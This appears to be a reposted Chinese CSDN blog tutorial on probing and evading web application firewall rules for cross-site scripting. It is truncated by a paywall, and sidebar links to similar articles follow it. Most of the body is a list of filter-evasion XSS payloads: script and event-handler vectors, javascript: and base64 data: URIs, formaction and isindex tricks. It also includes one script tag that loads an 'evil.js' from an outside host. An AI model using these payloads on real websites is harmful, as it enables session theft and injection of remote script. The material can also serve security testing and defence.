XSS现代WAF规则探测及绕过技术

最新推荐文章于 2024-07-22 16:46:56 发布
最新推荐文章于 2024-07-22 16:46:56 发布
阅读量626 收藏 3
点赞数
分类专栏: 安全开发 逆向漏洞 实战篇 web安全 工控安全 文章标签: xss 探测及绕过 XSS现代waf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/91822521
版权
本文详细探讨了XSS攻击中如何探测现代WAF规则,包括使用无害payload测试HTML编码与过滤,测试各种标签和属性,以及利用编码、事件处理、DOM漏洞等方式绕过WAF防护。同时,文章提到了多种WAF的绕过技术,并强调了黑名单防护的局限性,建议WAF使用者保持规则库更新并谨慎配置。
摘要由CSDN通过智能技术生成

在这里插入图片描述
初始测试

1、使用无害的payload,类似,,观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;

2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;

3、尝试以下的payload

<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm      (1);</script>
<script src="http://rhainfosec.com/evil.js">

判断是否触发过滤规则,尝试使用大小写混合字符

<scRiPt>alert(1);</scrIPt>

1、如果大小写不行的话,

2、使用标签测试

<a  href=“http://www.google.com">Clickme</a>

<a被过滤?

href被过滤?

其他内容被过滤?

如果没有过滤尝试使用

<a href=”javascript:alert(1)”>Clickme</a>

尝试使用错误的事件查看过滤

<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>

HTML5拥有150个事件处理函数,可以多尝试其他函数

<body/onhashchange=alert(1)><a href=#>clickit

测试其他标签

src属性

    <img src=x      onerror=prompt(1);>
    <img/src=aaa.jpg      onerror=prompt(1);
    <video src=x      onerror=prompt(1);>
    <audio src=x      onerror=prompt(1);>

iframe

    <iframesrc="javascript:alert(2)">
    <iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

Embed

    <embed/src=//goo.gl/nlX0P>

Action

    <form action="Javascript:alert(1)"><input type=submit>
    <isindex action="javascript:alert(1)" type=image>
    <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
    <isindex action=data:text/html, type=image>

mario验证

<span class="pln">    </span><span class="tag">&lt;formaction</span><span class="pun">=</span><span class="atv">&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class="tag">&gt;&lt;button&gt;</span><span class="pln">CLICK</span>

“formaction”属性

    <isindexformaction="javascript:alert(1)"      type=image>
    <input type="image" formaction=JaVaScript:alert(0)>
    <form><button formaction=javascript&colon;alert(1)>CLICKME

“background”属性

    <table background=javascript:alert(1)></table> // Works on Opera 10.5      and IE6

“posters” 属性

    <video
最低0.47元/天 解锁文章
Coisini、
关注
专栏目录
XSSWAF总结
afei001
05-22 323
目录 1.大佬XSS绕过WAF文章 2.on*事件相关属性 1.大佬XSS绕过WAF文章 2020年仍然有效的一些XSS Payload:https://zhuanlan.zhihu.com/p/107860601 XSS过滤器绕过总结:https://www.imzzj.com/2020/05/14/xss-guo-lu-qi-rao-guo-zong-jie.html XSS挑战之旅学习总结:https://www.secpulse.com/archives/59497.html .
WebShell 木马免杀过WAF
悦分享
08-02 652
什么是WAFWaf是web应用防火墙(WebApplicationFirewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。waf属于检测型及纠正型防御控制措施。waf分为硬件waf、软件waf(ModSecurity)、代码级wafWAF的原理waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警等。...
[转]XSS现代WAF规则探测绕过技术
12-18 232
初始测试 1、使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等; 2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应; 3、尝试以下的payload &lt...
WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析
最新发布
xt350488的博客
07-22 1980
xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQsql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw。
XSSWaf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 5290
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
xss绕过waf
None安全团队
04-28 1145
前言 360主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务… (虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。) 环境 火狐 360主机卫士Apache版 phpStudy2016(PHP-5.4.45+Apache) 测试代码 <?php $input = @$_REQUEST["xss"]; echo "<div>".$input."</div>" ?> 测试 习惯性的
绕过cdn探测真实ip方法大全
聚鼎安全
12-14 7790
渗透测试过程中,需要寻找真实IP的情况,就是目标使用了cdn。 CDN 现在大多数的网站都开启了CDN加速,导致我们获取到的IP地址不一定是真实的IP地址。 CDN的全称是Content Delivery Network,即内容分发网络。 其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。 通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息
Bypassing-Web-Application-Firewall-Workshop-eBook.en.zh-CN.pdf
05-24
绕过 WAF技术主要包括利用 WAF 的特定漏洞、采用复杂的编码方式、利用多步攻击策略等。下面详细介绍几种常见的绕过技术: 1. **HTTP 参数污染 (HPP)**:通过向 URL 中添加额外的参数来混淆原始请求,从而使 WAF ...
XSS绕过WAF的姿势
weixin_34112208的博客
05-16 415
初始测试 1.使用无害的payload,类似<b>,<i>,<u> 观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等; 2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应; 3.尝试以下payload <script>prompt(1)<...
28 WEB漏洞-XSS跨站之WAF绕过及安全修复
山兔的博客
09-25 673
在web层面里面,#会起到注释的作用,很多语言都是通用的,它是特殊的,基本上很多语言都会用到它,但是有些符号就不一定了,比如说在注入、上传或者其它漏洞里面,有些特殊符号是要根据你当前脚本网站的类型,还有我们当前操作的漏洞来取决于使用那些特殊符号,比如说像SQL注入漏洞,你写一些其它的符号,可能没有什么作用,因为在注入里面是跟数据库打交道,数据库对这些符号没有任何特殊的含义,你加上去仅仅只是加上去而已。特殊符号没有多少,也不用说那种漏洞,用那种特殊符号,特殊符号就是我们键盘上面的那几个,!
XSS漏洞介绍以及waf绕过
weixin_58052886的博客
06-27 1523
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。主要在于程序对输入和输出的控制不够严格,导致攻击者在将script代码输入后,在前端浏览器被当作有效代码解析并执行从而产生危害。
XSS 漏洞绕过
白菜执笔人的博客
03-04 2723
Web安全攻防 学习笔记 一、XSS 漏洞 1.1、跳过 Stage #9 在 span 标签中添加 onclick= "alert(document.domain)" (其他关卡也可以这样跳过) 1.2、domain 过滤绕过 首先还是构造特殊无害字符串,响应中寻找字符串观察闭合格式。 双写绕过 "><script>alert(document.dodomain...
xss-labs举例反射型xss注入的方式及基本思路
五分之一世纪
03-14 957
<1>XSS的分类 1.反射型 2.dom型 3.存储型 反射型解析:反射型的数据走向是 客户端->服务器->客户端,XSS-LABS中全是这种类型的,或者也可以说是dom型的,客户端根据html网页源码,判断注入漏洞,不调用html中的js代码是反射型,而dom型则是直接调用网页源码中的js代码。 dom型解析:dom型的数据走向是 URL->浏览器。 存储型解析:存储型的数据走向是 客户端->服务器->数据库->服务器->客户端,比如有些网站有评
XSS绕过总结
热门推荐
qq_42990434的博客
05-29 1万+
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 7050
XSS绕过-合集】
Web应用安全测试:XSS过滤器逃逸和WAF绕过技术
本文档讨论了 XSS Filter Evasion 和 WAF Bypassing 的技术,旨在帮助安全专业人员学习和掌握 XSS 测试的技巧。本文档分为四个部分,分别介绍 bypass 黑名单过滤器、bypass 化名过滤器、bypass 浏览器过滤器和其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值